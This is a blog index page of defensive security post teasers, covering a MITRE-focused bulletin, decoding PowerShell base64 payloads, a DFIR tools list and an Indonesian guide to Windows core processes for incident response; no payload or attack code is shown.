1st CDEF bulletin 2022

August 21, 2022

My writings on use case of MITRE that I send to cdef.id for their (supposedly) quarterly bulletin. This would be the second time cdef published my writings (check out the first one over here).

The bulletin can be accessed here or here

read more

powershell base64 payload

August 17, 2022

I was doing some ‘weird jobs’, and needed to know what really is happening with this powershell base64 payload. The payload itself is nothing typically new, but I think I’ll post it here incase someone needed it, since it was pretty hard trying these resources when I needed it.

so here’s some of those powershell payload.

read more

DFIR tools

August 06, 2022

even with the awesome list all over github, I kept losing tracks of cool tools, so here are some of them:

(last update 11.09.2022)

in the spirit of keep updating the resources, I’m moving this post to aldosimon/dfir

read more

windows core processes

April 16, 2022

Dalam sebuah kegiatan incident response, adakalanya kita perlu mengetahui karakteristik proses yang sedang berjalan, sehingga dapat memutuskan apakah proses tersebut malicious atau tidak. Berikut beberapa proses inti windows (Windows core processes), dengan sedikit deskripsi dan karakteristik masing-masing, sebagai acuan baseline, sehingga ketika melakukan incident response kita memiliki kemudahan untuk melakukan filtering proses yang malicious atau tidak.

read more